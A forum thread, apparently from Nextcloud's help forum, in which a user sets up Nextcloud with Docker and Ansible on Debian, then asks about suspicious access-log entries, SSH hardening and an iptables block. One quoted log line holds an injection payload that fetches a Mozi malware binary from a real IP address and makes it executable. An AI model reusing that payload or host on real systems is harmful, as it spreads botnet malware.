Setup Nextcloud via Docker... with everything baked in?

I installed a fresh Debian10 (Buster) server.
I was wondering if there is a “docker image” that has everything baked in?

Basically, have the image have apache, nextcloud, nginx, letsencrypt (for the https cert), etc.

Is this possible?
Initially, I was following the instructions on this link.

I then saw these examples, yet I can’t figure out how to use them – Nextcloud Docker Examples Page.

This blog posts touches some good topics, yet I didn’t like that he hard-codes versions.

Can somebody shed some guidance?

Thank you!

You can have a look at my guide here: https://help.nextcloud.com/t/howto-ubuntu-docker-nextcloud-talk-collabora/76430

This is running everything in Docker except for a reverse proxy and certbot.

Docker-compose with a group of containers is as “baked in” as you’ll get with Docker as each container is really only supposed to run a single process. With Docker-compose, you can run them collectively as a group.

Perhaps NCP (NextCloudPi) is something to consider
https://docs.nextcloudpi.com/en/how-to-get-started-with-ncp-docker/

The blog post is quite old, but the project got updated since that post quite often :wink:
https://ownyourbits.com/2017/06/08/nextcloudpi-docker-for-raspberry-pi/

So I ended up using this repo:

From there, using ansible, it setup everything.
Everything worked fine for about four-five days.

Today it stopped.
While searching why it was not working, I came across the following lines in the access.log

I found it quite odd the part that it does a wget to a website.
I don’t know if it’s invoking a shell previous to the GET.
Then it does a chmod 777.

Does any of this look odd?

wget+http://115.99.131.82:38982/Mozi.a;chmod+777+Mozi.a;

Maybe @Reiner_Nippes can say what happened.

I haven’t seen that masscan before, but it doesn’t sound to me like it belongs…

Also just to confirm, your log doesn’t actually say nextcloud.MYDOMAIN.com, correct?

doesn’t look good: https://urlhaus.abuse.ch/url/315025/

but it’s not from my playbook.

Thank you for the reply both of you!

I am wondering where “I went wrong” with the server.
Yesterday when I saw that wget and chmod 777 entries, I went the nuclear option and deleted the entire server.

I am rebuilding the server today with @Reiner_Nippes ’ ansible script.
Fresh Debian10 machine.
I usually use keys for ssh access, yet while setting up the server I still have not setup keys for this.
So:

  • no ssh keys
  • password were / are super long (53 random characters)

Any thoughts were I could have gone wrong and opened up the door for this?

It’s setup correctly, as
nextcloud.aDomainThatWasBought.com

Thank you for double checking!
=)

I would not allow remote SSH access to the server personally… Use a VPN if you need it.

your log looks like the ordinary script-scanned-server-log. to me.
half of the internet traffic today is port-scanning and vulnerability searching.
i think you just saw port knocking but no open doors.

nope. keys are more secure than passwords.

isn’t that the same as ssh? i mean if ssh would be unsecure you would read it at once on any it news page plus several twitter accounts.

if you want to be more secure you may want to restric the ssh access to a defined ip address.

I’m not saying keyed SSH is insecure, but from a network security standpoint, SSH is not at all the same as IPSec or OpenVPN. You would still be using SSH inside the VPN tunnel, drastically increasing security. At that point, the VPN has to be successfully hacked before an attempt can even be made to access SSH.

He just said he was using password auth SSH, and it appears his system was compromised, so I think there’s something to be said for not skimping on security.

Thanks to both.
I am going to setup new ssh-keys on this laptop.
Then I will copy the keys (plus my work station’s keys) to the server.
Then I will disable password ssh login, and disable root login.


Now, another interesting finding:
After re-doing the server last night with @Reiner_Nippes’ script, I tried today to login.

It does not work… I don’t get the login page.
If I ping the server at nextcloud.MYDOMAIN.com the ping returns perfectly.
If I login from a mobile phone (different IP address) the welcome page works fine.

So somewhere the IP I have is getting blocked.
I checked the nginx logs (access.log and error.log) and I do NOT see the hits from my browser (laptop with IP that is blocked).

I then checked fail2ban with:
fail2ban-client status sshd

And my IP is NOT listed there.

Any idea where Debian and/or the installation of Reiner’s script could be dropping the packets from my laptop?

Thank you very much for the help!

where did you see the evidence that that happened?

no idea. if you can connect from remote the system should be fine.
but you may check the firewall status.
the playbooks enables the firewall and opens port 22,80 and 443 to the world. normally that is fine as well.

The description of masscan:

This is an Internet-scale port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second, from a single machine.

You say it isn’t in your playbook. He says he didn’t install it. It came from somewhere.

Best not to take chances with this stuff.

So it was Debian’s iptables that was blocking my IP address.

I edited the rules, reloaded them, and now I can access the new instance.
I used this answer to perform the edits.
I will keep an eye out on the logs for anything abnormal.

I still have pending to install the ssh-keys.

@Reiner_Nippes
I did a small donation to the webpage you asked for in the git repo:

Stiftung Wir für Kinder in Not

Thank you for taking of your time to make the ansible script.

This is an entry in the nginx access log.
Doesn’t that mean his server was scanned with this massscaner? From outside?

Thanks a lot.